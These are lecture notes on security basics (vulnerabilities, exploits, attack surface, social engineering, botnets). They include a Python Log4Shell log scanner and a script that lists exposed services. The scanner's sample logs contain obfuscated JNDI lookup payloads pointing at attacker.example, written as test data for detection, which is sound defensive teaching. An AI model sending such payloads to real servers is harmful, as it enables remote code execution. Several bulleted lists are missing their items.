pk.org: Computer Security/Lecture Notes

Part 2 - Threats, Vulnerabilities, and Attacks

What attacks try to do

Paul Krzyzanowski – July 26, 2025

When systems fail or are compromised, it is usually because an attacker has discovered a vulnerability and found a way to exploit it. To understand computer security, we need to distinguish between vulnerabilities, exploits, attacks, and threats. These terms are often used interchangeably in casual conversation but they mean different things in security.

Vulnerabilities

A vulnerability is a flaw or weakness that can be exploited. Vulnerabilities may be caused by software bugs, design flaws, misconfigurations, or even human errors. They are the entry points that allow an attacker to compromise confidentiality, integrity, or availability.

Examples include:

Some vulnerabilities lie in hardware rather than in software.

These cases revealed that vulnerabilities are not limited to software mistakes but can be rooted in hardware design itself.

One of the most famous software vulnerabilities in recent history was Log4Shell (CVE-2021-44228) in Log4j, disclosed in December 2021. Log4j is a widely used Java library for logging messages. The library expanded lookup expressions embedded in the text it logged, including JNDI lookups of the form ${jndi:ldap://host/object}. An attacker who could get such a string into any field that an application logged, such as an HTTP User-Agent header or a username, could make the server contact an attacker-controlled directory server and load and execute code from it. Since Log4j was embedded in tens of thousands of software packages, the vulnerability had a global impact and is still being exploited today.
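As an added example, not part of the original notes, the Python below scans constructed web-server log lines for the Log4Shell lookup pattern. The sample lines and the host name attacker.example are made up. The detector first collapses the nested ${lower:...}, ${upper:...} and ${...:-x} lookups that attackers used to evade naive string matching, then looks for ${jndi:<scheme>:.

```python
import re

# Constructed sample access-log lines (not captured from a real server). The last
# field is the User-Agent header, a value that many applications log verbatim.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.7 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "curl/8.0"',
]

# ${lower:X} / ${upper:X} evaluate to X with its case changed; we keep X and
# lowercase everything at the end, so case does not matter for matching.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${key:-default} evaluates to "default" when key is undefined; ${::-j} is the
# degenerate form attackers used to spell "jndi" one letter at a time.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalization, a live lookup reads ${jndi:<scheme>:...}.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups from the inside out, the way Log4j's
    substitutor would, until the string stops changing."""
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text.lower()


def jndi_scheme(line: str):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) if the line carries a
    lookup that a vulnerable Log4j 2.x would resolve, otherwise None."""
    m = _JNDI.search(normalize(line))
    return m.group(1) if m else None


def scan(lines):
    """Return (index, scheme) for every suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    for i, scheme in scan(SAMPLE_LOGS):
        print(f"line {i}: JNDI lookup via {scheme} -> {SAMPLE_LOGS[i]}")
```

Log-based detection like this only tells you that a probe arrived, not whether the application was vulnerable or whether the outbound LDAP or RMI connection succeeded, so pair it with egress monitoring. It also misses encodings the normalizer does not handle; treat it as a triage filter, not as proof of absence.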

Exploits

An exploit is the tool, code, or technique that takes advantage of a vulnerability. The vulnerability is the unlocked door; the exploit is the crowbar used to break in.

For example:

The key point is that vulnerabilities and exploits are different. A vulnerability may exist for years before someone develops an exploit to take advantage of it.

Attacks

An attack is the execution of an exploit with the intent to cause harm. Attacks put exploits into action. They may attempt to steal data, alter information, disable services, or gain unauthorized control.

Common types of attacks include:

The Colonial Pipeline attack in 2021 is a clear example. Attackers logged into the company’s network with a leaked password for a VPN account that did not require multi-factor authentication, then deployed DarkSide ransomware on its IT systems; the company shut down the pipeline while it contained the incident. This was not just a vulnerability but a full attack with real-world consequences: fuel shortages across the U.S. East Coast.

Attack Vectors

An attack vector is the path or method an attacker uses to deliver an exploit. Vectors define how an attack begins.

Examples include:

The Stuxnet worm, discovered in 2010, reached the control systems of Iran’s Natanz uranium-enrichment facility through infected USB drives. Because that network was air-gapped, with no connection to the Internet, the attackers had to rely on removable media carried in by people as the attack vector.

Attack Surface

An attack surface is the set of all points at which an attacker could try to get into a system or extract data from it. The more exposed services, interfaces, inputs, and users a system has, the larger its attack surface and the more opportunities an attacker has.

Examples of attack surface include:

Reducing the attack surface makes systems harder to compromise. Disabling unused services, limiting access, and educating users all help shrink the number of possible entry points.
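As an added example that is not from the original notes, the script below measures one slice of a host’s attack surface: which listening TCP services are reachable from other machines. It parses constructed output in the column layout of `ss -Hltn` on Linux (State, Recv-Q, Send-Q, Local Address:Port, Peer Address:Port); the sample lines, addresses and ports are made up.

```python
import ipaddress
import sys

# Constructed sample in the column layout of `ss -Hltn` (State Recv-Q Send-Q
# Local-Address:Port Peer-Address:Port). Not captured from a real host.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 127.0.0.1:5432 0.0.0.0:*
LISTEN 0 4096 [::]:80 [::]:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 128 10.0.0.5:8080 0.0.0.0:*
LISTEN 0 511 *:443 *:*
"""


def split_local(addr: str):
    """Split an ss local-address field such as '[::]:80', '0.0.0.0:22' or '*:443'
    into (host, port). IPv6 hosts arrive bracketed, so split on the last colon."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def is_network_reachable(host: str) -> bool:
    """True if a socket bound to this address accepts connections from other
    machines: wildcard binds (0.0.0.0, ::, *) and interface addresses do,
    loopback binds (127.0.0.0/8, ::1) do not."""
    if host in ("*", ""):
        return True
    return not ipaddress.ip_address(host).is_loopback


def exposed_services(ss_output: str):
    """Return [(host, port)] for every listening socket reachable from the network."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # skip headers, blank lines and non-listening states
        host, port = split_local(fields[3])
        if is_network_reachable(host):
            exposed.append((host or "*", port))
    return exposed


if __name__ == "__main__":
    # Read real `ss -Hltn` output from stdin when piped in, else use the sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SS
    for host, port in exposed_services(data):
        print(f"exposed: {host}:{port}")
```

Services bound only to 127.0.0.1 or ::1 are not listed: they are still attack surface for code already running on the host, but not for a network attacker. Listening TCP sockets are only one dimension; open UDP ports, management interfaces, third-party dependencies, and the users who can be phished are attack surface too.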

Social Engineering

Not all vulnerabilities are technical. In many attacks, the easiest path in is not through a software flaw but through a person. Social engineering refers to techniques that manipulate, deceive, or influence people into giving up information or access. Instead of breaking cryptography or bypassing a firewall, an attacker may simply trick a user into opening the door.

Common methods include:

A classic example was the 2011 RSA breach. Attackers sent a phishing email with the subject line “2011 Recruitment Plan.” The attached Excel file contained an embedded Flash object that exploited a zero-day vulnerability in Adobe Flash Player (CVE-2011-0609). Once opened, it installed a remote-access tool that gave attackers a foothold on RSA’s internal systems and, eventually, access to sensitive data related to its SecurID authentication tokens. This attack succeeded not through a technical vulnerability alone, but because an employee trusted and opened the file.

Social engineering underscores that humans are part of the attack surface. Training, awareness, and organizational culture are as important as software patches in reducing risk. We will look at social engineering methods in much more detail later in the course.

Known vulnerabilities are cataloged with CVE identifiers and scored for severity with CVSS, two systems we’ll explore in detail later.

Threats and Threat Actors

A threat is the possibility of an attack. A threat actor (or agent) is the adversary who may carry it out. Not every threat actor attacks, but the potential exists.

Ross Anderson, in his book Security Engineering, classifies threats into four categories:

Other terms often used in this context include snooping (eavesdropping), modification (alteration), masquerading (spoofing), repudiation of origin, denial of receipt, and delay.

Classifying threats always rests on assumptions about an attacker’s motivation and skill. A system may be resistant to casual scanning but vulnerable to determined adversaries with custom tools.

Threat Matrix

Another way to classify threats is by capability and focus. A threat matrix distinguishes between:

Most real-world attacks fall somewhere on this spectrum. Opportunistic automated scanning for weak passwords is very different from a targeted advanced persistent threat, but both fit within the threat matrix.

The Internet as a Risk Amplifier

The design of the Internet makes attacks easier. It was created in the 1970s to interconnect networks, not to provide secure communication. Its architecture is open and decentralized, which is powerful but risky.

Features that make the Internet attractive for attackers include:

These structural properties explain why defending systems is so difficult. The Internet gives attackers opportunities that would not exist in the physical world.

Botnets

A botnet is a network of compromised machines (often called bots or zombies) controlled remotely through a command-and-control (C2) server. Botnets are used for spam, phishing, cryptocurrency mining, and especially for launching DDoS attacks. The Mirai botnet in 2016 demonstrated what hundreds of thousands of insecure IoT devices (home routers, IP cameras, DVRs) could do when turned into a coordinated weapon: Mirai spread by scanning for devices with Telnet open and logging in with a short list of factory-default usernames and passwords, and its DDoS attack on the DNS provider Dyn in October 2016 knocked major websites offline for hours.

Case Studies

The following incidents illustrate how vulnerabilities, exploits, and attacks play out in practice. Some are classic examples that highlight fundamental concepts, while others are more recent cases showing that these problems remain pressing today.